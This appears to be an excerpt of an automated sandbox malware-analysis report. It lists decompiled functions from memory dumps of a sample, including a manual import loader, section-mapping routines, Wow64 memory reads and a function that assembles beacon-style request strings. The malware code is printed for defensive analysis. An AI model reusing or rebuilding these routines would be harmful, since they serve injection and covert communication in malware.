                                                            • Opcode Fuzzy Hash: 30335dec29f88378c7f926de13ada1ea94910b89b6dc03b9477e7fe4fe8ef42a
                                                            • Instruction Fuzzy Hash: F8211DB5D00209AFDB11DFE9C8849DEFBF9EF48354F50842AE615F3210D7319A498BA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 045692F3, Relevance: 4.7, APIs: 3, Instructions: 168librarynativeloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetProcAddress.KERNEL32(?,00000318), ref: 04569318
                                                            • NtWow64QueryInformationProcess64.NTDLL(00000000,00000000,?,00000030,00000000), ref: 04569334
                                                              • Part of subcall function 04583C35: RtlAllocateHeap.NTDLL(00000000,?,04580BE2), ref: 04583C41
                                                              • Part of subcall function 04566EB0: GetProcAddress.KERNEL32(?,00000000), ref: 04566ED9
                                                              • Part of subcall function 04566EB0: NtWow64ReadVirtualMemory64.NTDLL(00000100,?,?,00000028,00000000,00000000,00000100,00000000,?,?,?,04569375,00000000,00000000,00000028,00000100), ref: 04566EFB
                                                            • StrRChrA.SHLWAPI(00000018,00000000,0000005C,00000000,00000318,?,00000000,00000068,00000098,00000000,00000028,00000040,00000000,00000000,00000028,00000100), ref: 0456949E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: AddressProcWow64$AllocateHeapInformationMemory64Process64QueryReadVirtual
                                                            • String ID:
                                                            • API String ID: 3547194813-0
                                                            • Opcode ID: 33bf7cf1d27c3fd319d8d7e13017ac122782bf3930f636903011b34e0aefe942
                                                            • Instruction ID: 921fc81f635b7c3a1a5346c7b2a2479b0fa7abcc571be108e406d14ce897fb75
                                                            • Opcode Fuzzy Hash: 33bf7cf1d27c3fd319d8d7e13017ac122782bf3930f636903011b34e0aefe942
                                                            • Instruction Fuzzy Hash: 45615DB0A0020AAFDF14DFA8D980BAEB7B5FF48305F004058ED15EB241DB34EA55DBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04575AED, Relevance: 4.6, APIs: 3, Instructions: 56librarynativeloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memset.NTDLL ref: 04575B01
                                                            • GetProcAddress.KERNEL32(?), ref: 04575B29
                                                            • NtWow64QueryInformationProcess64.NTDLL(?,00000000,?,00000030,00000000,?,00001000,00000000), ref: 04575B47
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: AddressInformationProcProcess64QueryWow64memset
                                                            • String ID:
                                                            • API String ID: 2968673968-0
                                                            • Opcode ID: 84c88b17f14b38c7686d4db75b1fb9bff8df92f1662f92b12047a65db92b4e57
                                                            • Instruction ID: 2024bf9d317edc0d52fdee537aceaef36dd4ea5f006b91692ad34a8f0778f6b4
                                                            • Opcode Fuzzy Hash: 84c88b17f14b38c7686d4db75b1fb9bff8df92f1662f92b12047a65db92b4e57
                                                            • Instruction Fuzzy Hash: E0115431600219BFDB11DB54ED85FAD77B9FB44704F054029E905EB290EB74ED05DB60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6E4B1552, Relevance: 3.1, APIs: 2, Instructions: 92libraryloaderCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E6E4B1552(void* __edi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr* _v12;
				_Unknown_base(*)()** _v16;
				signed int _v20;
				signed short _v24;
				struct HINSTANCE__* _v28;
				intOrPtr _t43;
				intOrPtr* _t45;
				intOrPtr _t46;
				struct HINSTANCE__* _t47;
				intOrPtr* _t49;
				intOrPtr _t50;
				signed short _t51;
				_Unknown_base(*)()* _t53;
				CHAR* _t54;
				_Unknown_base(*)()* _t55;
				void* _t58;
				signed int _t59;
				_Unknown_base(*)()* _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				signed int _t68;
				void* _t69;
				CHAR* _t71;
				signed short* _t73;

				_t69 = __edi;
				_v20 = _v20 & 0x00000000;
				_t59 =  *0x6e4b41cc;
				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x4d92f9a0));
				if(_t43 != 0) {
					_t45 = _t43 + __edi;
					_v12 = _t45;
					_t46 =  *((intOrPtr*)(_t45 + 0xc));
					if(_t46 != 0) {
						while(1) {
							_t71 = _t46 + _t69;
							_t47 = LoadLibraryA(_t71); // executed
							_v28 = _t47;
							if(_t47 == 0) {
								break;
							}
							_v24 = _v24 & 0x00000000;
							 *_t71 = _t59 - 0x69b25f44;
							_t49 = _v12;
							_t61 =  *((intOrPtr*)(_t49 + 0x10));
							_t50 =  *_t49;
							if(_t50 != 0) {
								L6:
								_t73 = _t50 + _t69;
								_v16 = _t61 + _t69;
								while(1) {
									_t51 =  *_t73;
									if(_t51 == 0) {
										break;
									}
									if(__eflags < 0) {
										__eflags = _t51 - _t69;
										if(_t51 < _t69) {
											L12:
											_t21 =  &_v8;
											 *_t21 = _v8 & 0x00000000;
											__eflags =  *_t21;
											_v24 =  *_t73 & 0x0000ffff;
										} else {
											_t65 = _a4;
											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
												goto L12;
											} else {
												goto L11;
											}
										}
									} else {
										_t51 = _t51 + _t69;
										L11:
										_v8 = _t51;
									}
									_t53 = _v8;
									__eflags = _t53;
									if(_t53 == 0) {
										_t54 = _v24 & 0x0000ffff;
									} else {
										_t54 = _t53 + 2;
									}
									_t55 = GetProcAddress(_v28, _t54);
									__eflags = _t55;
									if(__eflags == 0) {
										_v20 = _t59 - 0x69b25ec5;
									} else {
										_t68 = _v8;
										__eflags = _t68;
										if(_t68 != 0) {
											 *_t68 = _t59 - 0x69b25f44;
										}
										 *_v16 = _t55;
										_t58 = 0x593682f4 + _t59 * 4;
										_t73 = _t73 + _t58;
										_t32 =  &_v16;
										 *_t32 = _v16 + _t58;
										__eflags =  *_t32;
										continue;
									}
									goto L23;
								}
							} else {
								_t50 = _t61;
								if(_t61 != 0) {
									goto L6;
								}
							}
							L23:
							_v12 = _v12 + 0x14;
							_t46 =  *((intOrPtr*)(_v12 + 0xc));
							if(_t46 != 0) {
								continue;
							} else {
							}
							L26:
							goto L27;
						}
						_t60 = _t59 + 0x964da13a;
						__eflags = _t60;
						_v20 = _t60;
						goto L26;
					}
				}
				L27:
				return _v20;
			}




























                                                            0x6e4b1552
                                                            0x6e4b155b
                                                            0x6e4b1560
                                                            0x6e4b1566
                                                            0x6e4b156f
                                                            0x6e4b1575
                                                            0x6e4b1577
                                                            0x6e4b157a
                                                            0x6e4b157f
                                                            0x6e4b1586
                                                            0x6e4b1586
                                                            0x6e4b158a
                                                            0x6e4b1592
                                                            0x6e4b1595
                                                            0x00000000
                                                            0x00000000
                                                            0x6e4b159b
                                                            0x6e4b15a5
                                                            0x6e4b15a7
                                                            0x6e4b15aa
                                                            0x6e4b15ad
                                                            0x6e4b15b1
                                                            0x6e4b15b9
                                                            0x6e4b15bb
                                                            0x6e4b15be
                                                            0x6e4b1626
                                                            0x6e4b1626
                                                            0x6e4b162a
                                                            0x00000000
                                                            0x00000000
                                                            0x6e4b15c3
                                                            0x6e4b15c9
                                                            0x6e4b15cb
                                                            0x6e4b15de
                                                            0x6e4b15e1
                                                            0x6e4b15e1
                                                            0x6e4b15e1
                                                            0x6e4b15e5
                                                            0x6e4b15cd
                                                            0x6e4b15cd
                                                            0x6e4b15d5
                                                            0x6e4b15d7
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x6e4b15d7
                                                            0x6e4b15c5
                                                            0x6e4b15c5
                                                            0x6e4b15d9
                                                            0x6e4b15d9
                                                            0x6e4b15d9
                                                            0x6e4b15e8
                                                            0x6e4b15eb
                                                            0x6e4b15ed
                                                            0x6e4b15f4
                                                            0x6e4b15ef
                                                            0x6e4b15ef
                                                            0x6e4b15ef
                                                            0x6e4b15fc
                                                            0x6e4b1602
                                                            0x6e4b1604
                                                            0x6e4b1634
                                                            0x6e4b1606
                                                            0x6e4b1606
                                                            0x6e4b1609
                                                            0x6e4b160b
                                                            0x6e4b1613
                                                            0x6e4b1613
                                                            0x6e4b1618
                                                            0x6e4b161a
                                                            0x6e4b1621
                                                            0x6e4b1623
                                                            0x6e4b1623
                                                            0x6e4b1623
                                                            0x00000000
                                                            0x6e4b1623
                                                            0x00000000
                                                            0x6e4b1604
                                                            0x6e4b15b3
                                                            0x6e4b15b5
                                                            0x6e4b15b7
                                                            0x00000000
                                                            0x00000000
                                                            0x6e4b15b7
                                                            0x6e4b1637
                                                            0x6e4b1637
                                                            0x6e4b163e
                                                            0x6e4b1643
                                                            0x00000000
                                                            0x00000000
                                                            0x6e4b1649
                                                            0x6e4b1654
                                                            0x00000000
                                                            0x6e4b1654
                                                            0x6e4b164b
                                                            0x6e4b164b
                                                            0x6e4b1651
                                                            0x00000000
                                                            0x6e4b1651
                                                            0x6e4b157f
                                                            0x6e4b1655
                                                            0x6e4b165a

                                                            APIs
                                                            • LoadLibraryA.KERNELBASE ref: 6E4B158A
                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 6E4B15FC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1185181412.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true
                                                            • Associated: 00000000.00000002.1185112968.000000006E4B0000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1185264812.000000006E4B3000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1185310564.000000006E4B5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1185336391.000000006E4B6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID:
                                                            • API String ID: 2574300362-0
                                                            • Opcode ID: 8a48a5d92633dfb7b84d408996cbde42c4d2a64f391d07fe6b8d5ec0e0c8a947
                                                            • Instruction ID: 473b181b5843783e6c1d2d73f471dd5dc7f57dd61de151e69bacaf93a4c83296
                                                            • Opcode Fuzzy Hash: 8a48a5d92633dfb7b84d408996cbde42c4d2a64f391d07fe6b8d5ec0e0c8a947
                                                            • Instruction Fuzzy Hash: D5313771A0020A9FDB44CFA9C894EAEB7F8FF45344F14406AD916EB345E770EA49CB60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00DD3C64, Relevance: 3.1, APIs: 2, Instructions: 70nativeCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 72%
                                                            			E00DD3C64(intOrPtr* __eax, void** _a4) {
				int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				int _v40;
				int _v44;
				void* _v48;
				void* __esi;
				long _t34;
				void* _t39;
				void* _t47;
				intOrPtr* _t48;

				_t48 = __eax;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 =  *((intOrPtr*)(__eax + 4));
				_v16 = 0;
				_v12 = 0;
				_v48 = 0x18;
				_v44 = 0;
				_v36 = 0x40;
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
				if(_t34 < 0) {
					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
				} else {
					 *_t48 = _v16;
					_t39 = E00DD37E0(_t48,  &_v12); // executed
					_t47 = _t39;
					if(_t47 != 0) {
						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
					} else {
						memset(_v12, 0, _v24);
						 *_a4 = _v12;
					}
				}
				return _t47;
			}


















                                                            0x00dd3c6d
                                                            0x00dd3c74
                                                            0x00dd3c75
                                                            0x00dd3c76
                                                            0x00dd3c77
                                                            0x00dd3c78
                                                            0x00dd3c89
                                                            0x00dd3c8d
                                                            0x00dd3ca1
                                                            0x00dd3ca4
                                                            0x00dd3ca7
                                                            0x00dd3cae
                                                            0x00dd3cb1
                                                            0x00dd3cb8
                                                            0x00dd3cbb
                                                            0x00dd3cbe
                                                            0x00dd3cc1
                                                            0x00dd3cc6
                                                            0x00dd3d01
                                                            0x00dd3cc8
                                                            0x00dd3ccb
                                                            0x00dd3cd1
                                                            0x00dd3cd6
                                                            0x00dd3cda
                                                            0x00dd3cf8
                                                            0x00dd3cdc
                                                            0x00dd3ce3
                                                            0x00dd3cf1
                                                            0x00dd3cf1
                                                            0x00dd3cda
                                                            0x00dd3d09

                                                            APIs
                                                            • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,73B74EE0,00000000,00000000,00DD20F8), ref: 00DD3CC1
                                                              • Part of subcall function 00DD37E0: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,00DD3CD6,00000002,00000000,?,?,00000000,?,?,00DD3CD6,00000000), ref: 00DD380D
                                                            • memset.NTDLL ref: 00DD3CE3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: Section$CreateViewmemset
                                                            • String ID:
                                                            • API String ID: 2533685722-0
                                                            • Opcode ID: 575fa4710d5ff5a1ea186f9f222b5de923179de98ef6dc9a7f348c8f399866c7
                                                            • Instruction ID: 8b267685b9b36e039e4c9f45da1a873eb1da89bd339b606b77ede38e1ef37341
                                                            • Opcode Fuzzy Hash: 575fa4710d5ff5a1ea186f9f222b5de923179de98ef6dc9a7f348c8f399866c7
                                                            • Instruction Fuzzy Hash: EC211DB5D00209AFCB11DFA9C8859EEFBB9EF48354F10842AE656F3210D7319A488F61
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04566EB0, Relevance: 3.0, APIs: 2, Instructions: 35librarynativeloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 04566ED9
                                                            • NtWow64ReadVirtualMemory64.NTDLL(00000100,?,?,00000028,00000000,00000000,00000100,00000000,?,?,?,04569375,00000000,00000000,00000028,00000100), ref: 04566EFB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: AddressMemory64ProcReadVirtualWow64
                                                            • String ID:
                                                            • API String ID: 752694512-0
                                                            • Opcode ID: 98ec89cde59ed134fbebe6ad2ff4a62ba3c807b3cf230e080d05a04b8d7ad8d1
                                                            • Instruction ID: d81748acaec1895c75291025bea5ebc89646125df7a1dae6f6522c8c666cbf1f
                                                            • Opcode Fuzzy Hash: 98ec89cde59ed134fbebe6ad2ff4a62ba3c807b3cf230e080d05a04b8d7ad8d1
                                                            • Instruction Fuzzy Hash: DBF0E276500209BB8B12CF9AEC85C9EBBBAFB98750B14401DF601E3220DB75E955EB20
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6E4B121F, Relevance: 1.5, APIs: 1, Instructions: 34nativeCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 68%
                                                            			E6E4B121F(void** __esi, PVOID* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t13;

				_v16 = 0;
				asm("stosd");
				_v8 = 0;
				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
				if(_t13 < 0) {
					_push(_t13);
					return __esi[6]();
				}
				return 0;
			}







                                                            0x6e4b1231
                                                            0x6e4b1237
                                                            0x6e4b1245
                                                            0x6e4b124c
                                                            0x6e4b1251
                                                            0x6e4b1257
                                                            0x00000000
                                                            0x6e4b1258
                                                            0x00000000

                                                            APIs
                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,?,?,00000002,00000000,?), ref: 6E4B124C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1185181412.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true
                                                            • Associated: 00000000.00000002.1185112968.000000006E4B0000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1185264812.000000006E4B3000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1185310564.000000006E4B5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1185336391.000000006E4B6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: SectionView
                                                            • String ID:
                                                            • API String ID: 1323581903-0
                                                            • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                                            • Instruction ID: b0aa3008a4b45d7105df2648f9a7f4d5a570f5f5c60d7ac90c50f81d71e6a31a
                                                            • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                                            • Instruction Fuzzy Hash: CDF01CB690020CBFEB119FA5CC85C9FBBBDEB44394B10493AF252E1190D670AE088A60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00DD37E0, Relevance: 1.5, APIs: 1, Instructions: 34nativeCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 68%
                                                            			E00DD37E0(void** __esi, PVOID* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t13;

				_v16 = 0;
				asm("stosd");
				_v8 = 0;
				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
				if(_t13 < 0) {
					_push(_t13);
					return __esi[6]();
				}
				return 0;
			}







                                                            0x00dd37f2
                                                            0x00dd37f8
                                                            0x00dd3806
                                                            0x00dd380d
                                                            0x00dd3812
                                                            0x00dd3818
                                                            0x00000000
                                                            0x00dd3819
                                                            0x00000000

                                                            APIs
                                                            • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,00DD3CD6,00000002,00000000,?,?,00000000,?,?,00DD3CD6,00000000), ref: 00DD380D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: SectionView
                                                            • String ID:
                                                            • API String ID: 1323581903-0
                                                            • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                                            • Instruction ID: 6e26d39c233ac8fefd5cec7f55be9460578783a3b135df411544d764fdefd3c9
                                                            • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                                            • Instruction Fuzzy Hash: E4F012B590020CBFDB119FA5CC85C9FBBBDEB44354B10893AB552E1191D6309E089B61
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04570FA5, Relevance: 1.5, APIs: 1, Instructions: 33nativeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • NtQueryInformationProcess.NTDLL(00000000,00000402,00000018,00000000,0458C300), ref: 04570FBC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: InformationProcessQuery
                                                            • String ID:
                                                            • API String ID: 1778838933-0
                                                            • Opcode ID: eca4c24ae03f616daa9a5f20bae9d4c5558c7a863d056d91985e86af1d1655bc
                                                            • Instruction ID: 7588f5a503bfcc8e4b7d37bce12f42b90287b423a0ec76e70ec88f82cee113f9
                                                            • Opcode Fuzzy Hash: eca4c24ae03f616daa9a5f20bae9d4c5558c7a863d056d91985e86af1d1655bc
                                                            • Instruction Fuzzy Hash: 0EF05E3130112A9B8720CE55E894D9FBBE8FB05B54B00D164F901EB290D730FD46EBE0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00DD7106, Relevance: 42.2, APIs: 23, Strings: 1, Instructions: 220memorystringCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 70%
                                                            			E00DD7106(long __eax, void* __edx, intOrPtr _a8, intOrPtr _a12, void* _a20, intOrPtr _a28) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v24;
				intOrPtr _v40;
				void* __ecx;
				void* __edi;
				intOrPtr _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				intOrPtr _t35;
				void* _t38;
				intOrPtr _t39;
				int _t42;
				void* _t43;
				intOrPtr _t44;
				intOrPtr _t48;
				intOrPtr _t52;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr _t62;
				intOrPtr _t66;
				intOrPtr* _t68;
				void* _t69;
				intOrPtr _t78;
				intOrPtr _t81;
				intOrPtr _t84;
				int _t87;
				intOrPtr _t88;
				int _t91;
				intOrPtr _t92;
				int _t95;
				void* _t98;
				void* _t99;
				void* _t103;
				intOrPtr _t105;
				long _t107;
				intOrPtr _t108;
				intOrPtr* _t109;
				long _t110;
				int _t111;
				void* _t112;
				void* _t113;
				void* _t114;
				void* _t115;
				void* _t117;
				void* _t118;
				void* _t120;
				void* _t121;

				_t103 = __edx;
				_t110 = __eax;
				_v8 = 8;
				_t117 = RtlAllocateHeap( *0xdda290, 0, 0x800);
				if(_t117 != 0) {
					if(_t110 == 0) {
						_t110 = GetTickCount();
					}
					_t31 =  *0xdda018; // 0x7b557b46
					asm("bswap eax");
					_t32 =  *0xdda014; // 0x5cb11ae7
					asm("bswap eax");
					_t33 =  *0xdda010; // 0x15dc9586
					asm("bswap eax");
					_t34 =  *0xdda00c; // 0x67522d90
					asm("bswap eax");
					_t35 =  *0xdda2d4; // 0x2bed5a8
					_t2 = _t35 + 0xddb622; // 0x74666f73
					_t111 = wsprintfA(_t117, _t2, 2, 0x3d163, _t34, _t33, _t32, _t31,  *0xdda02c,  *0xdda004, _t110);
					_t38 = E00DD4155();
					_t39 =  *0xdda2d4; // 0x2bed5a8
					_t3 = _t39 + 0xddb662; // 0x74707526
					_t42 = wsprintfA(_t111 + _t117, _t3, _t38);
					_t120 = _t118 + 0x38;
					_t112 = _t111 + _t42;
					if(_a12 != 0) {
						_t92 =  *0xdda2d4; // 0x2bed5a8
						_t7 = _t92 + 0xddb66d; // 0x732526
						_t95 = wsprintfA(_t112 + _t117, _t7, _a12);
						_t120 = _t120 + 0xc;
						_t112 = _t112 + _t95;
					}
					_t43 = E00DD35BC(_t99);
					_t44 =  *0xdda2d4; // 0x2bed5a8
					_t9 = _t44 + 0xddb38a; // 0x6d697426
					_t113 = _t112 + wsprintfA(_t112 + _t117, _t9, _t43, _t103);
					_t48 =  *0xdda2d4; // 0x2bed5a8
					_t11 = _t48 + 0xddb33b; // 0x74636126
					_t114 = _t113 + wsprintfA(_t113 + _t117, _t11, 0);
					_t52 =  *0xdda32c; // 0x39c95b0
					_t121 = _t120 + 0x1c;
					if(_t52 != 0) {
						_t88 =  *0xdda2d4; // 0x2bed5a8
						_t13 = _t88 + 0xddb685; // 0x73797326
						_t91 = wsprintfA(_t114 + _t117, _t13, _t52);
						_t121 = _t121 + 0xc;
						_t114 = _t114 + _t91;
					}
					_t105 =  *0xdda37c; // 0x39c9630
					_a28 = E00DD49BA(0xdda00a, _t105 + 4);
					_t55 =  *0xdda31c; // 0x39c95e0
					_t107 = 0;
					if(_t55 != 0) {
						_t84 =  *0xdda2d4; // 0x2bed5a8
						_t16 = _t84 + 0xddb8e9; // 0x3d736f26
						_t87 = wsprintfA(_t114 + _t117, _t16, _t55);
						_t121 = _t121 + 0xc;
						_t114 = _t114 + _t87;
					}
					_t56 =  *0xdda318; // 0x0
					if(_t56 != _t107) {
						_t81 =  *0xdda2d4; // 0x2bed5a8
						_t18 = _t81 + 0xddb8e2; // 0x3d706926
						wsprintfA(_t114 + _t117, _t18, _t56);
					}
					if(_a28 != _t107) {
						_t98 = RtlAllocateHeap( *0xdda290, _t107, 0x800);
						if(_t98 != _t107) {
							E00DD3D0C(GetTickCount());
							_t62 =  *0xdda37c; // 0x39c9630
							__imp__(_t62 + 0x40);
							asm("lock xadd [eax], ecx");
							_t66 =  *0xdda37c; // 0x39c9630
							__imp__(_t66 + 0x40);
							_t68 =  *0xdda37c; // 0x39c9630
							_t69 = E00DD637D(1, _t103, _t117,  *_t68); // executed
							_t115 = _t69;
							asm("lock xadd [eax], ecx");
							if(_t115 != _t107) {
								StrTrimA(_t115, 0xdd92ac);
								_push(_t115);
								_t108 = E00DD7067();
								_v4 = _t108;
								if(_t108 != 0) {
									 *_t115 = 0;
									__imp__(_t98, _a8);
									_t109 = __imp__;
									 *_t109(_t98, _t108);
									 *_t109(_t98, _t115);
									_t78 = E00DD3735(0xffffffffffffffff, _t98, _v12, _v8); // executed
									_v40 = _t78;
									if(_t78 != 0 && _t78 != 0x10d2) {
										E00DD454A();
									}
									HeapFree( *0xdda290, 0, _v24);
								}
								HeapFree( *0xdda290, 0, _t115);
								_t107 = 0;
							}
							HeapFree( *0xdda290, _t107, _t98);
						}
						HeapFree( *0xdda290, _t107, _a20);
					}
					RtlFreeHeap( *0xdda290, _t107, _t117); // executed
				}
				return _v16;
			}






















































                                                            0x00dd7106
                                                            0x00dd711a
                                                            0x00dd711c
                                                            0x00dd712a
                                                            0x00dd712e
                                                            0x00dd7136
                                                            0x00dd713e
                                                            0x00dd713e
                                                            0x00dd7140
                                                            0x00dd714c
                                                            0x00dd715b
                                                            0x00dd7160
                                                            0x00dd7163
                                                            0x00dd7168
                                                            0x00dd716b
                                                            0x00dd7170
                                                            0x00dd7173
                                                            0x00dd717f
                                                            0x00dd718c
                                                            0x00dd718e
                                                            0x00dd7194
                                                            0x00dd7199
                                                            0x00dd71a4
                                                            0x00dd71a6
                                                            0x00dd71a9
                                                            0x00dd71af
                                                            0x00dd71b1
                                                            0x00dd71ba
                                                            0x00dd71c5
                                                            0x00dd71c7
                                                            0x00dd71ca
                                                            0x00dd71ca
                                                            0x00dd71cc
                                                            0x00dd71d3
                                                            0x00dd71d8
                                                            0x00dd71e5
                                                            0x00dd71e7
                                                            0x00dd71ec
                                                            0x00dd71fa
                                                            0x00dd71fc
                                                            0x00dd7201
                                                            0x00dd7206
                                                            0x00dd7209
                                                            0x00dd720e
                                                            0x00dd7219
                                                            0x00dd721b
                                                            0x00dd721e
                                                            0x00dd721e
                                                            0x00dd7220
                                                            0x00dd7233
                                                            0x00dd7237
                                                            0x00dd723c
                                                            0x00dd7240
                                                            0x00dd7243
                                                            0x00dd7248
                                                            0x00dd7253
                                                            0x00dd7255
                                                            0x00dd7258
                                                            0x00dd7258
                                                            0x00dd725a
                                                            0x00dd7261
                                                            0x00dd7264
                                                            0x00dd7269
                                                            0x00dd7273
                                                            0x00dd7275
                                                            0x00dd727c
                                                            0x00dd7294
                                                            0x00dd7298
                                                            0x00dd72a4
                                                            0x00dd72a9
                                                            0x00dd72b2
                                                            0x00dd72c3
                                                            0x00dd72c7
                                                            0x00dd72d0
                                                            0x00dd72d6
                                                            0x00dd72de
                                                            0x00dd72e3
                                                            0x00dd72f0
                                                            0x00dd72f6
                                                            0x00dd72fe
                                                            0x00dd7304
                                                            0x00dd730a
                                                            0x00dd730e
                                                            0x00dd7312
                                                            0x00dd7318
                                                            0x00dd731c
                                                            0x00dd7323
                                                            0x00dd732a
                                                            0x00dd732e
                                                            0x00dd7339
                                                            0x00dd7340
                                                            0x00dd7344
                                                            0x00dd734d
                                                            0x00dd734d
                                                            0x00dd735e
                                                            0x00dd735e
                                                            0x00dd736d
                                                            0x00dd7373
                                                            0x00dd7373
                                                            0x00dd737d
                                                            0x00dd737d
                                                            0x00dd738e
                                                            0x00dd738e
                                                            0x00dd739c
                                                            0x00dd739c
                                                            0x00dd73ac

                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(00000000,00000800,?), ref: 00DD7124
                                                            • GetTickCount.KERNEL32 ref: 00DD7138
                                                            • wsprintfA.USER32 ref: 00DD7187
                                                            • wsprintfA.USER32 ref: 00DD71A4
                                                            • wsprintfA.USER32 ref: 00DD71C5
                                                            • wsprintfA.USER32 ref: 00DD71E3
                                                            • wsprintfA.USER32 ref: 00DD71F8
                                                            • wsprintfA.USER32 ref: 00DD7219
                                                            • wsprintfA.USER32 ref: 00DD7253
                                                            • wsprintfA.USER32 ref: 00DD7273
                                                            • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00DD728E
                                                            • GetTickCount.KERNEL32 ref: 00DD729E
                                                            • RtlEnterCriticalSection.NTDLL(039C95F0), ref: 00DD72B2
                                                            • RtlLeaveCriticalSection.NTDLL(039C95F0), ref: 00DD72D0
